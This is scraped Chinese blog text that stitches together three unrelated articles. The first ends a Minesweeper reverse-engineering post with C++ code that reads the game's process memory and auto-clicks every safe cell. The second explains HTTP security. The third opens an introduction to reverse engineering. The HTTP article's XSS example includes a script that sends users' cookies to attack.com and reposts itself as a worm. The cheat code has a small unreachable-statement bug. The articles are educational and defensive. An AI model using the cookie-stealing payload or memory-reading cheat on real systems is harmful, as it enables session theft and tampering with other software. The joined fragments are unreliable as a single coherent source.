    接下来是通过C++实现一键扫雷功能,主要是模拟鼠标在雷区的点击操作,并且按下所有非雷区域从而实现一键扫雷。利用的是Windows应用程序的消息机制,通过SendMessage函数向指定窗口发送消息,也就是在获取到扫雷的窗口句柄后,利用这个函数向该窗口发送鼠标按键消息,从而实现模拟鼠标的操作。

    该部分参考ioio_jy老师的文章:逆向工程第007篇:扫雷辅助的研究——0秒实现一键自动扫雷

    第一步,创建一个应用程序名叫“SaoleiHelp”,并添加主函数。

    在这里插入图片描述


    第二步,分析扫雷的区域及坐标定义。
    坐标是基于客户区的左上角,但是这个客户区是怎么定义的呢?
    如下图所示,究竟A点是客户区的左上角,还是说B点才是呢?如果A点为坐标原点,那么第一块雷区的坐标就应为(AC,CE),如果B点为坐标原点,那么第一块雷区的坐标就应为(BD,DE)。经过实际测试,MSDN中所谓的客户区,其实是以B点作为起点的位置,即原点坐标(0,0),而雷区中心即E点的坐标为(16,61),每个雷区小方块的大小为16×16,于是可以知道,这里需要循环计算出雷区每一个小方块的坐标,这个坐标与保存有雷区的二维数组下标紧密相关。

    在这里插入图片描述

    假设这个二维数组是mine[y1][x1],其中y1表示的是雷区有多少行,x1表示雷区的列数,那么每个雷区方块的坐标为:

    x = x1 * 16 + 16;
    y = y1 * 16 + 61;
    

    在获得了坐标以后,就可以通过如下语句来模拟鼠标的点击操作了:

    SendMessage(hWnd, WM_LBUTTONDOWN, MK_LBUTTON, MAKELONG(x, y));
    SendMessage(hWnd, WM_LBUTTONUP, MK_LBUTTON, MAKELONG(x, y));
    

    第三步,分析扫雷游戏的雷区长宽数据。
    结合之前宽度、高度的分析,发现高度位置为0x01005338,宽度位置为0x01005334。我们进一步推断,从0x01005330开始,这里的一行绿色数据包含有0x0A、0x09以及0x09这三个数值,很明显这三个数据正是当前雷区的地雷数量以及宽、高等信息

    • 雷数:0x01005330
    • 宽度:0x01005334
    • 高度:0x01005338

    在这里插入图片描述

    同时,我们上面的逆向分析已经知道雷区分布的信息。

    • “8F”表示地雷
    • “8E”表示旗子
    • “40”表示空格
    • “41”到“49”表示数字
    • “10”表示边界
    • “0F”表示隔一行

    还有一个重要信息是雷区的分布起始地址,即:

    • 0x01005361

    但如果计算含有边界的情况,雷区的分布情况则为:

    • 起始地址:0x01005340
    • 结束地址:0x0100567F

    在这里插入图片描述


    完整代码如下:

    #include <stdio.h>
    #include <windows.h>
    #include <graphics.h>
    
    int main() {
    	DWORD Pid = 0;
    	HANDLE hProcess = 0;
    
    	DWORD result1, result2;
    
    	// 获取扫雷游戏对应的窗口句柄
    	HWND hWnd = FindWindow(NULL, L"扫雷");
    	if (hWnd != 0) {
    		// 获取扫雷进程ID
    		GetWindowThreadProcessId(hWnd, &Pid);
    		// 打开扫雷游戏获取其句柄
    		hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
    		if (hProcess == 0) {
    			printf("Open winmine process failed.");
    			return 0;
    		}
    
    		// 存放雷区的起始地址
    		DWORD dwBoomAddr = 0x01005340;
    
    		// 雷区的最大值(包含边界)
    		DWORD dwSize = 832;
    		PBYTE pByte = NULL;
    		pByte = (PBYTE)malloc(dwSize);
    
    		// 读取整个雷区的数据
    		ReadProcessMemory(hProcess, (LPVOID)dwBoomAddr, pByte, dwSize, 0);
    		int i = 0;
    		int j = 0;
    		int n = dwSize;
    
    		// 读取雷区的长和宽
    		DWORD dwInfo = 0x01005330;
    		DWORD dwHeight = 0, dwWidth = 0;
    		ReadProcessMemory(hProcess, (LPVOID)(dwInfo + 4), &dwWidth, sizeof(DWORD), 0);    //宽度
    		ReadProcessMemory(hProcess, (LPVOID)(dwInfo + 8), &dwHeight, sizeof(DWORD), 0);   //高度
    
    		int h = dwHeight;
    		int count = 0;
    
    		// 雷区转换,去掉雷区多余的数据
    		PBYTE pTmpByte = NULL;
    		pTmpByte = (PBYTE)malloc(dwHeight * dwWidth);
    		while (i < dwSize) {
    			//边界判断
    			if (pByte[i] == 0x10 && pByte[i + 1] == 0x10) {
    				i = i + dwWidth + 2;
    				continue;
    			}
    			else if (pByte[i] == 0x10) {
    				for (j = 1; j <= dwWidth; j++) {
    					pTmpByte[count] = pByte[i + j];
    					count++;
    				}
    				i = i + dwWidth + 2;
    				continue;
    				h--;
    				if (h == 0) break;
    			}
    			i++;
    		}
    
    		// 获取雷区方块的坐标,然后模拟鼠标进行点击
    		int x1 = 0, y1 = 0;
    		int x = 0, y = 0;
    		for (i = 0; i < dwHeight * dwWidth; i++) {
    			if (pTmpByte[i] != 0x8F) { //雷
    				x1 = i % dwWidth;
    				y1 = i / dwWidth;
    				x = x1 * 16 + 16;
    				y = y1 * 16 + 61;
    				SendMessage(hWnd, WM_LBUTTONDOWN, MK_LBUTTON, MAKELONG(x, y));   //鼠标按下
    				SendMessage(hWnd, WM_LBUTTONUP, MK_LBUTTON, MAKELONG(x, y));     //鼠标抬起
    			}
    		}
    
    		free(pByte);
    		CloseHandle(hProcess);
    	}
    	else {
    		printf("Get hWnd failed.");
    	}
    	return 0;
    }
    

    运行结果如下图所示,一秒实现扫雷。

    在这里插入图片描述



    四.总结

    写到这里,这篇文章就介绍完毕,希望对您有所帮助,最后进行简单的总结下。

    • 一.什么是逆向分析
      1.逆向工程
      2.逆向分析的典型应用
    • 二.扫雷游戏逆向分析
      1.游戏介绍
      2.OllyDbg动态分析
    • 三.扫雷游戏检测工具
      1.Cheat Engine确定起始位置
      2.Cheat Engine确定边界
      3.C++编写鼠标坐标获取案例
      4.C++编写自动扫雷程序

    学安全一年,认识了很多安全大佬和朋友,希望大家一起进步。这篇文章中如果存在一些不足,还请海涵。作者作为网络安全初学者的慢慢成长路吧!希望未来能更透彻撰写相关文章。同时非常感谢参考文献中的安全大佬们的文章分享,深知自己很菜,得努力前行。

    在这里插入图片描述

    《珈国情》
    明月千里两相思,
    清风缕缕寄离愁。
    燕归珞珈花已谢,
    情满景逸映深秋。
    最感恩的永远是家人的支持,知道为啥而来,知道要做啥,知道努力才能回去。夜已深,虽然笨,但还得奋斗。

    (By:Eastmount 2020-07-26 星期一 晚上9点写于武汉 http://blog.csdn.net/eastmount/ )



    2020年8月18新开的“娜璋AI安全之家”,主要围绕Python大数据分析、网络空间安全、人工智能、Web渗透及攻防技术进行讲解,同时分享CCF、SCI、南核北核论文的算法实现。娜璋之家会更加系统,并重构作者的所有文章,从零讲解Python和安全,写了近十年文章,真心想把自己所学所感所做分享出来,还请各位多多指教,真诚邀请您的关注!谢谢。

    参考文献:
    真心推荐大家好好看看这些视频和文章,感恩这些大佬!
    [1] 科锐逆向的钱林松老师受华中科技大学邀请- “逆向分析计算引导”
    [2] c++学习笔记——VS2015中添加graphics.h头文件 - 行歌er
    [3] 逆向工程第007篇:扫雷辅助的研究——0秒实现一键自动扫雷
    [4] https://www.bilibili.com/video/BV18W411U7NH
    [5] [网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
    [6] [网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向

    展开全文
  • 什么是HTTP?为什么是安全的?

    千次阅读 2020-01-21 18:54:22
    我们在输入网址的时候一般是www.baidu.com,浏览器都会自动帮我们加上HTTP或者HTTPS这样的前缀,国内...了解HTTPS之前需要先了解HTTP,知道了HTTP的局限,才能掌握HTTPS安全的本质。 基本概念 在TCP/IP网络协...

    我们在输入网址的时候一般是www.baidu.com,浏览器都会自动帮我们加上HTTP或者HTTPS这样的前缀,国内对于HTTPS讲解的书很少,最近有空拜读了《深入浅出https:从原理到实战》这本书,接下来会分几次表述一下对于这本书的一些笔记或者理解。

     

    了解HTTPS之前需要先了解HTTP,知道了HTTP的局限,才能掌握HTTPS安全的本质。

     

    1. 基本概念

     

    在TCP/IP网络协议成熟以后,世界上任何的设备只要支持TCP/IP就能成为互联网的一个终端,我们安装的浏览器都安装了这个协议。

     

    当TCP/IP逐步流行后,数据传输变得非常容易,任何终端,不管是个人计算机还是手机设备,只要支持TCP/IP,数据就能够从世界上任意一端传输到另外一端,距离不再是问题。

     

    但互联网传输字节流数据不是人能够看得懂的,为了翻译这些数据,让通信的两方用同样的方式去解读这些数据,我们必须定义一个标准,这样两边才能正确的解读数据内容,这就是应用层HTTP的雏形。

     

    HTTP到现在能够传输的数据类型越来越多,有文字、图片、视频等,有了协议,有了内容,如何把这些内容串联起来。

     

    HTTP的意思是超文本传输协议,其中的超文本的意思是关联关系,就是可以从一个地方跳到另外一个地方,就是我们常用的URL,URL代表的互联网的一个资源的地址。

     

    最终Web技术产生了,Web技术是Tim Berners-Lee教授在1980年提出的一个设想,主要包括三个技术,分别是HTML、URL、HTTP。即使到今天,Web模型也没有太大的变化

     

    HTTP概念:超文本传输协议,超文本就是HTML,传输表示由HTTP负责客户端和服务器的数据传输和解析。客户端发送一个HTTP请求至服务器,服务器响应该请求,将数据再发送给客户端。HTTP由一系列规则组成,客户端和服务器需要正确的处理这些规则,HTTP可以认为是信息的载体,信息的内容是由HTML页面组成的。

     

    URL概念:Web由很多资源组成,比如HTML页面、视频、图片,在互联网上每个资源都有一个编号,这个编号就是URL地址。服务器负责定义URL,世界上任何一个资源的编号是唯一的,客户端通过URL地址在互联网中找到该资源,URL的官方名称叫作统一资源标识符(Uniform ResourceLocator)。

     

    URL的规则定义如下:

     

    http://www/example.com:80/index.html

     

    http表示资源需要通过HTTP这个协议才能够获取,换句话说,客户端需要通过HTTP这个协议请求这个资源。

     

    www.example.com表示服务器地址,在互联网中每个服务器都有一个IP地址,但对于用户来说IP地址很难记住,用户一般只会记住服务器主机(比如www.baidu.com的ip是180.101.49.11,但我们进百度的时候都不会输入IP,只会输入网址)名称。

     

    在HTTP中,客户端发送HTTP请求的时候,必须通过DNS协议将服务器主机名转换为IP地址,这样客户端才能找到服务器。80是HTTP协议的默认端口(可以省略不输入),表示服务器通过80端口提供HTTP服务。/index.html表示服务器在/根目录下有一个index.html资源。这就是URL的全部,主要是定义资源的互联网地址,URL虽然和HTTP是紧密关联的,但在Web中是互相独立的。

     

    HTML概念:早期的互联网传输的就是文字,后来为了方便阅读加入了一些样式,比如加粗,换行,标红等等,对文字进行特殊的处理,还可以通过URL来进行图片和视频资源的引用。这些对文字进行特殊处理的规则发展成CSS和JS语言,他们都是HTML的一部分。

     

    Web,大家可能有一个概念,在浏览器中输入一个网址,返回对应网站的页面,然后点点点或者搜索就能找到我们需要的内容,这些返回的内容通过F12键位查看,其实是一个个HTML的页面,这些页面就构成了Web,也被称为WWW(world wide web)。

     

    在web访问中,我们从浏览器发出请求,浏览器就是客户端,接受请求的就是服务器,比如我们在百度里面搜索西红柿,浏览器就会把这个请求发送到百度的服务器,服务器返回搜索的内容,这个过程中HTTP扮演的是数据请求和响应的角色,真正的数据传输是由其他网络层进行处理的。

     

    Web其实是我们常说的互联网的一部分,互联网还包含邮件应用、FTP等,现在我们基本认为web就是互联网。

     

    Web最核心的内容就是HTTP,HTTP由服务器和客户端组成,有了HTTP不同的终端才能交换数据。

     

    1. 理解HTTP

     

    以谷歌浏览器的请求为例,以上是一个简单的请求,请求的URLhttp://www.example.com/index.html,请求的方式是get请求,如果对资源做一定的修改的话一般是post请求,status code表示请求的状态,200 ok表示请求和返回都正常,异常的有400404等。

     

    Remote address表示请求服务器的IP地址和端口,从请求可以看出请求域名最终会被解析成IP地址。

     

    上面是请求的头包含的一些参数:

    Accept-Encoding:gzip

    表示浏览器支持的数据压缩算法是gzip,压缩之后传输的内容会更小,目的是为了更快的传输,参数是gzip等于告之服务器,是否可以使用gzip算法压缩响应后再发送。服务器收到请求后解析Accept-Encoding头部,了解客户端希望使用gzip压缩算法压缩HTTP响应。如果服务器支持gzip压缩算法,会对所有的HTML响应压缩后再发送给客户端(头部并不压缩),为了让客户端知道响应是经过gzip压缩的,需要输出Content-Encoding:gzip头部,如果服务器不支持gzip算法,也可以原样将HTML响应发送给客户端,并且不输出Content-Encoding头部。

     

    Connection: keep-alive

    当一个网页打开之后,等于客户端和服务端已经建立起了TCP连接,连接参数是keep-alive表示后面客户端的访问会继续使用这个连接而不必再次建立,如果随时关闭的话可以设置为close,这个连接不是一直连接,而是有一定的时间,可以在服务器上进行设置。

     

    Hostwww.example.com

    需要DNS解析器进行解析。加入你在阿里云购买了一个服务器和一个域名,需要将域名和服务器进行绑定,也就是让DNS能够把你的域名解析成你服务器的IP

     

    User-Agent: Mozilla/5.0

    客户端的浏览器版本。

     

     

    上面是返回的头,下面是返回的HTML内容:

    <!doctype html>
    
    <html>
    
    <head>
    
        <title>Example Domain</title>
    
    
    
        <meta charset="utf-8" />
    
        <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    
        <meta name="viewport" content="width=device-width, initial-scale=1" />
    
        <style type="text/css">
    
        body {
    
            background-color: #f0f0f2;
    
            margin: 0;
    
            padding: 0;
    
            font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
    
           
    
        }
    
        div {
    
            width: 600px;
    
            margin: 5em auto;
    
            padding: 2em;
    
            background-color: #fdfdff;
    
            border-radius: 0.5em;
    
            box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
    
        }
    
        a:link, a:visited {
    
            color: #38488f;
    
            text-decoration: none;
    
        }
    
        @media (max-width: 700px) {
    
            div {
    
                margin: 0 auto;
    
                width: auto;
    
            }
    
        }
    
        </style>   
    
    </head>
    
    
    
    <body>
    
    <div>
    
        <h1>Example Domain</h1>
    
        <p>This domain is for use in illustrative examples in documents. You may use this
    
        domain in literature without prior coordination or asking for permission.</p>
    
        <p><a href="https://www.iana.org/domains/example">More information...</a></p>
    
    </div>
    
    </body>
    
    </html>

    这个HTML在浏览器上显示出来就是:

     

     

    HTTP有以下几个特点:

    1. 客户端/服务器模型

    HTTP是一个客户端/服务器模型, 它本身是不能传输的,需要通过网络层中的其他协议进行通信,一般构建在TCP之上。TCP能够提供一个可靠的、面向连接的传输服务,换句话说,客户端和服务器是否正确传输依赖于TCP这个协议。

    2HTTP是无状态的

    HTTP是基于TCP的,早期的请求完成之后TCP连接会关闭,完全和上一次的请求没有关系。

    在互联网早期,可以说这种设计很好,但是现在的Web应用越来越丰富,无状态的设计已经不能适应新的情况,为了保持状态,出现了CookieSession技术,但是Cookie技术设计得非常不严谨,引发了很多安全问题。。

    3HTTP是跨平台的

    通过上面的讲解,读者知道HTTP就是具备一定规则的纯文本信息,任何开发语言都可以实现HTTP或者基于HTTP进行开发,开发出来的软件也很容易移植,受系统环境的影响非常少。

    4HTTP用途很广泛

    Web主要使用HTTP进行传输数据,HTTP更多的是一个数据载体,对于Web应用来说更重要的是浏览器如何处理这些数据,这些本身和HTTP关系并不大。考虑到HTTP如此简单,基于HTTP的应用非常多,比如,不管是iOS还是Andriod应用,都需要调用基于HTTPAPI接口。

    TCP/IP概述

    TCP/IP是标准的互联网网络协议,没有该协议就没有互联网,互联网上的终端必须配置TCP/IP才能进行通信。

     

    任何协议都是一种标准,标准的含义就是通信双方需要遵循相同的规则,才能互相协作。想象两个人互相打电话,拨打电话的人首先要知道对方的手机号(IP地址),然后拨打电话确保连接上对方(TCP),通过IP选择一条最优的传输路径,最终应用层数据(人的语言)通过终端(网卡)、网络设备(电话线)传输给对方。

    它的层级大概如下:

     

     

    1. 应用层

    如果没有应用层,那么网络中传输的数据没有任何意义,因为人类无法理解数据的含义。而有了应用层,软件就能解释应用层数据的含义。在Web应用中,有了HTTPHTML标准,浏览器才能呈现对用户有意义的内容。应用层协议有很多,比如HTTPFTP、邮件协议,开发者开发的软件一般都是应用层协议软件。

    1. 传输层

    客户端传输层接收到应用层消息后,负责连接服务器,但服务器有很多服务,服务器如何知晓客户端需要连接的服务呢?传输层中通过端口来区分服务,通过IP地址和端口号才能构建一条传输通道,对于HTTP来说,服务器端口号默认是80,而客户端的端口是随机产生的。传输层主要有TCPUDP, TCP能够保证数据正确地到达,一旦出现错误,会有一系列处理机制,比如重发和校验机制,保证数据正确地传输到对端。HTTP构建在TCP之上,在连接阶段,TCP使用三次握手机制确保可靠传输。

     

    1.初始化连接,客户端发送SYN消息(随机值x)请求一个新连接。

    2.服务器接收SYN消息,发送SYN ACK响应消息。

    3.客户端发送ACK消息确认本次连接成功。

    UDP不能保证数据正确传达,比如客户端收到数据后,不会向服务器确认本次接收到的数据有多少,所以服务器也无法确认客户端是否正确收到了数据,UDP的优点就是性能高,减少了很多开销。

    1. 网络层

    网络层主要是IP这个协议,客户端和服务器传输的时候,会经过很多节点,IP就是选择一条最优的路径。每个终端上都有一张路由表,路由表负责将数据传输到下一个节点,下一个节点再传输到下下个节点,最终到达目的地址。

    1. 链路层

    应用层、传输层、网络层都是虚拟的,只有链路层才是实体设备,包括光纤、网卡等设备。基于这些设备,数据最终才能到达终端。

     

    接下来简单描述封包/拆包机制,对于客户端请求来说,传输层接收到应用层消息后,在HTTP数据包前面增加TCP包头,然后发送给网络层;网络层在TCP数据包前面加上IP包头发送给链路层;链路层在IP数据包前面加上以太网包头;最终服务器接收到完整的数据包。

     

    然后服务器进行拆包:首先在网络层去除链路层包头;在传输层去除IP包头;在应用层去除TCP包头;最终得到完整的HTTP应用层数据。

     

    协议安全分析

     

    知道了基本的概念,下面分析互联网安全,包括两部分:

    HTTP本身的安全和Web应用的安全。

     

    HTTP安全:

    1. 无线WIFI攻击:现在走到哪里先问WiFi密码,但是一些攻击者会提供免费的WiFi,当你使用HTTP协议的情况下,连接这些WiFi的时候,你将没有任何的隐私。

    提供WiFi的人可以截获所有的HTTP流量,而HTTP流量本身都是明文的,这就导致任何的个人信息、密码等全部被截获,而使用这些WiFi的人并没有感知,这叫被动攻击。

    1. 垃圾广告攻击:很多用户浏览某个网页的时候,经常发现页面上弹出一个广告,而这个广告和访问的网页根本毫无关系,这种攻击很常见,主要是ISP(互联网服务提供商)发动的一个攻击,用户根本没有任何办法防护。用户访问网站的时候肯定经过ISP, ISP为了一些目的,比如获取广告费用,在响应中插入一段HTML代码,就导致了该攻击的产生。这种攻击称为主动攻击,也就是攻击者知晓攻击的存在。

    这种攻击用户还能忍受,更严重的是ISP或者攻击者在页面中插入一些恶意JavaScript脚本,脚本一旦在客户端运行可能会产生更恶劣的后果,比如XSS攻击(跨站脚本攻击)。

    协议不安全的根本原因:

    1. 数据没有加密:

     HTTP本身传递的是明文,不会加密这些信息,只要攻击者能够获取这些明文,用户的隐私就完全暴露了。HTTP是基于TCP/IP的,TCP/IP的特点也决定了HTTP数据很容易被截获,网络传输过程中,路由策略决定HTTP数据会通过很多节点设备,节点很轻松就能截获明文数据,由于数据没有加密,很容易理解其含义。

    2.无法验证身份

    HTTP应用中,客户端和服务器并不能确认对方的身份,在HTTP标准中,没有校验对端身份的标准。对于服务器来说,它接收的HTTP请求格式只要正确,就发送响应信息。对于客户端来说同样如此,它连接的是www.example.com主机,但由于有中间节点的存在,最终连接的可能是www.example.cn主机,但对于客户端来说,它无法校验服务器的身份。

    3.数据易篡改

    HTTP数据在传输过程中,会经过很多节点,这些节点都可以修改原始数据,而对于客户端和服务器来说,没有任何技术来确保接收的数据就是发送者发送的原始数据。

    由于没有机制确保数据的完整性,客户端和服务器只能无条件信任接收到的数据,这也产生了很多安全问题,篡改数据也叫作中间人攻击。比如ISP插入广告的例子,如果有一种机制能够让浏览器知晓数据已经被篡改,那么浏览器就可以告知用户危险,并中断本次请求。

     

    Web应用安全

    HTTP只负责数据传输,真正的攻击对象是浏览器(用户)和服务器(数据)。

     

    互联网早期服务器负责输出数据,客户端基于HTML负责渲染,标签和元素非常少,这种群情况下攻击只要构建一条不规范的HTTP请求就行了,也有利用程序的漏洞来进行SQL注入破坏服务器数据。

     

    互联网中期HTML扩展了很多标签,脚本语言JS等广泛使用,在客户端完成的逻辑越来越多,可供攻击的模式也越来越多,执行恶意脚本等成为常见的手法。

     

    这里以常见的XSS攻击方式进行说明,XSS就是利用应用程序的漏洞,诱使用户触发恶意代码,从而自动发送恶意的HTTP请求至服务器,造成自动攻击。

     

    通过一个博客系统来描述XSS攻击:

     

    攻击者发现一个博客系统存在漏洞,发表文章的时候,服务器没有转义或者过滤数据

     

    攻击者用账号登录博客系统,打开文章编辑器,输入正常的内容,但是在文章末尾加入一段恶意代码(<script type='text/javascript'src='http://www.attack.com/attack.js'></script>)。

    由于服务器没有任何的校验机制,所以正常生成了一篇文章,比如http://www.example.com/article.html

     

    攻击者将这篇文章的地址发送到各大论坛,或者将文章地址用邮件发送给其他人。

     

    不明真相的人一旦打开这篇文章,浏览器就会下载并置执行attack.js文件,由于该文件包含了恶意代码,就可以进行攻击

    <script type=" text/ javascript" >
    
             $ (function() {
    
                      var cookie = encodeURIComponent (document. cookie)
    
                      $(’<img src="http://www. attack. com/attack. php? cookie=' + cookie+’">').appendTo($ (document. body))
    
                      var content = "<scr"+" ipt type='text/javascript' src=' http://wwww.attack.com/attack. js’></scr"+" ipt>"
    
                      $.post("http://www.example.com/sendArticle.php",{content :content},function(result) {});
    
             })
    
    </script>

     

    这段代码中会产生两个攻击:将用户www.example.com主机下的所有Cookie信息发送给攻击者。自动以正常用户的身份生成一篇文章,而这篇文章包含同样的攻击代码。

    目前的互联网

     

    目前互联网更关注移动互联网,尤其是手机设备,为了更好地支持移动设备并提升性能,提出了HTML5标准,HTML5标准是下一代HTML标准。HTML5支持了更多的功能,比如说地理位置、照相机,而这些功能是手机设备本身具备的。对于开发者来说,由于拥有了更多的设备控制能力,会进一步导致安全问题,比如在HTML旧标准中,客户端JavaScript最多获取设备上的Cookie,不能获取设备的其他信息,而在HTML5中,客户端还能获取手机照片库信息,一旦应用实现出现问题,会暴露设备上更多的隐私信息,所以浏览器在实现HTML5标准的时候,会有很多的安全策略,这些标准是由W3C指定的。

     

    W3C

     

    Tim Berners-Lee教授提出Web技术后成立了W3C组织,W3C主要制定Web技术的标准,比如HTML标准、DOM标准、CSS标准、ECMAScript标准,而实现这些标准主要由浏览器厂商或者服务器厂商完成。如果没有严格遵守标准,会产生很多兼容和安全问题。

     

    在互联网早期,W3C没有过多考虑安全问题,而目前W3C有了更多的安全标准,尤其在制定HTML5标准的时候,充分考虑了安全问题。

     

    W3C主要以HTTP头部的方式提供安全保护,比如Access-Control-Allow-OriginX-XSS-ProtectionStrict-Transport-SecurityContent-Security-Policy HTTP头部,一旦开发者和浏览器正确地遵守安全标准,就能缓解安全问题。

     

    比如前面的XSS攻击,主要原因就在于浏览器执行了一个外部JavaScript脚本,如果浏览器按照策略不加载外部脚本,攻击就无从谈起了。比如服务器输出下面的Content-Security-Policy头信息,等于告诉浏览器只允许加载www.example.com本域下的脚本文件,就能避免XSS攻击。

     

    Content-Security-Policy: default-src:’self’; script-src: http://www.example.com;

     

    展开全文
  • 娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要...第一篇文章先带领大家学习什么是逆向分析,然后详细讲解逆向分析的典型应用,接着通过OllyDbg工具逆向分析经典的游戏扫雷,再通过Cheat Engin

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全、逆向分析和恶意代码检测,“系统安全”系列文章会更加聚焦,更加系统,更加深入,也是作者的慢慢成长史。换专业确实挺难的,逆向分析也是块硬骨头,但我也试试,看看自己未来四年究竟能将它学到什么程度,漫漫长征路,偏向虎山行。享受过程,一起加油~

    系统安全系列主要包括恶意样本分析、病毒逆向分析、系统安全攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。第一篇文章先带领大家学习什么是逆向分析,然后详细讲解逆向分析的典型应用,接着通过OllyDbg工具逆向分析经典的游戏扫雷,再通过Cheat Engine工具复制内存地址获取,实现一个自动扫雷程序。

    该篇文章也是作者学习科锐钱林松老师在华中科技大学的分享视频,这里非常推荐大家去看看。话不多说,让我们开始新的征程吧!您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助,作者的目的是与安全人共同进步,加油~

    作者的github资源:


    声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。(参考文献见后)


    一.什么是逆向分析

    1.逆向工程

    科锐钱老师真的是大佬,拥有十余年的逆向工作经验,专注于先进技术的算法还原及逆向实训。作者从中学习到很多知识。本次课程分享的是逆向分析技术的引导,课程目标是带领大家了解下逆向分析是干什么的,在安全领域中是什么地位,并且穿插各种实战示例,尽量提高大家的兴趣。逆向分析是安全的基础行业,喜欢的人觉得很好玩,不喜欢的人觉得很苦逼。

    在讲逆向分析前,大家思考下:你有没有把别人的产品或Demo还原出源代码来过呢?而且就是作者的源代码,包括里面的BUG。

    • 反汇编:一次编译技术,阅读汇编代码反推出对应的高级代码,比如VC、GCC、Delphi等。
    • 反编译:通常在C#、Java、.NET框架等,因为它可以直接把元数据还原成高级代码,反编译其实更难,但是对使用的人更简单,比如Android的APK反编译成JAVA源代码。

    下面开始吧!第一个大家需要知道的是“什么是逆向工程?”


    什么是逆向工程?
    简单而言,一切从产品中提取原理及设计信息并应用于再造及改进的行为,都是逆向工程。在信息安全中,更多的是调查取证、恶意软件分析等,不管你用什么工具或手段,能达到其目的就算逆向分析。下图是《变形金刚》里面对它的描述,2007年的时候国内对信息安全重视程度也不高,对逆向分析也没有什么概念,真正重视是从老大提出“没有网络安全就没有国家安全”之后。而那时候的国外电影就已经用到了“reverse engineered”,说明国外导员对这个技术及应用场景都是了解的。

    在这里插入图片描述

    逆向工程最早是在二Z时的船舶工业,分析船的弱点,通过外形反推内部结构,其中粉红色是Amuno、黄色是引擎室、蓝色是龙骨、绿色是推进器等等。只有知道怎么造一个船后,才能进行逆向分析。

    在这里插入图片描述

    当然还有模具逆向、材料逆向、软件逆向,在我们的软件行业,就称为软件逆向。同样,在网络攻防中,你不可能先给出源码再进行攻击,通常在安全对抗中第一步要做的就是逆向分析,不管你用什么方式进行逆向分析,你都需要搞清楚:

    • 它是什么:样本是什么,良性的还是恶意的
    • 它干了什么:样本做了哪些事情
    • 我们怎么办:知道做了什么才能进行反制,如删除注册表启动项、清理感染的勒索病毒等

    在这里插入图片描述



    2.逆向分析的典型应用

    软件逆向有很多实现办法达到我们的目标,典型的应用包括软件工程、网络安全、司法取证、商业保护等。

    在这里插入图片描述


    逆向应用——病毒分析
    对于逆向分析,最大的行当就是病毒分析。对于一个安全企业来说,比如360,它的病毒分析团队属于它的主业,包括360、金山毒霸、腾讯医生等,它们主要业务就是根据一些恶意样本的行为,给出解决方案(专业查杀、完善引擎、应急响应),比如WannaCry爆发时,立刻分析其原因和传播漏洞,分析其影响程度及给出解决方案。所以,研究逆向病毒的人很多,当然坏的行当做游戏WG也很多,它们的对抗也是没有源码的,游戏安全人员会分析WG样本进行完善及修补。

    2000年早期制作病毒的人都比较单纯,写病毒是为了技术炫耀或开玩笑,典型的比如乒乓球病毒,每个周末都爆发,开启计算机后就有个乒乓球在电脑上弹,导致电脑不能用,而周一到周五恢复正常(可能是讨厌加班),此时的病毒没有获取用户隐私、删除数据等行为。

    在这里插入图片描述


    逆向利用——游戏保护
    从2005年开始,随着网游普及和网络虚拟财产(游戏装备)出现,大家也没有安全意识,出现了很多恶意程序和病毒,比如熊猫烧香,它是由李俊制作并肆虐网络的一款电脑病毒,是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒,它不但能感染系统中exe、com、pif、src、html、asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的系统备份文件。

    同时,游戏WG也开始增多,并形成了包括私服、生产、PJ、DH等功能的生产线,通过分析游戏的关键数据结构,找到关键数据并对数据做修改以达到提升的效果。比如吃鸡游戏,如果你通过逆向分析找到每个玩家的坐标位置了,你是不是可以写一个透视G,前提是你知道其数据以什么形式存放在哪里,这就属于PJ挂。你甚至还可以修改攻击力、防御值,游戏的碰撞检测(两者间距离小于某个值)也可以取消实现飞天、穿墙等。

    在这里插入图片描述

    当然,我们的信息安全是正能量的,逆向分析主要是剖析病毒,包括:

    • 逆向病毒,获取病毒传播方法,可以遏制病毒传播
    • 逆向病毒,获取病毒隐藏手段,可以根除病毒
    • 逆向分析病毒,获取功能目的,可以溯源定位攻击者

    逆向应用——漏洞挖掘
    逆向应用还包括漏洞挖掘和漏洞利用,其中黑客挖掘漏洞的常用方法为:

    • 通过分析开源软件的源代码,获取漏洞
    • 通过分析产品本身获取漏洞
    • 通过分析可以利用漏洞的软件样本
    • 通过比较软件前后补丁的差异

    大家是否有研究过shellcode、缓冲区溢出?漏洞利用溢出缓冲区,首先要把关键内存、关键代码定位出来,这就属于逆向分析。在漏洞利用过程中,只有你越熟悉周围环境则可利用的漏洞就越多,比如逆向服务端,调用shell创建新用户功能,这个时候是没有源代码的,所以需要利用漏洞分析。

    逆向分析是信息安全行业的基础技术、必须技术和重要技术,只有你功力越深厚,则做的事情就越多。

    在这里插入图片描述


    漏洞利用——比较补丁
    下图展示了比较补丁前后差异的工具。比如官方软件在网上有安全更新,关注安全行情和漏洞公告的行当或企业会对比官方的补丁,在拿到官方升级后的软件,他们会对两个流程做比较,其中左边流程多了一个节点,说明升级就是这个位置,再详细分析为什么多了这个个检测。注意,官方公告通常会非常简略(补丁号、造成后果、影响范围),比如某个MP3播放器在播放某个冷门格式的音频文件时,会触发一个远程溢出问题,接下来我们就需要去做逆向分析,下载升级前和升级后的版本做流程对比。

    在这里插入图片描述


    逆向应用——电子取证
    通过样本追踪地理位置的实例,后续会给出一个实战案例。

    在这里插入图片描述


    漏洞利用——无文档学习
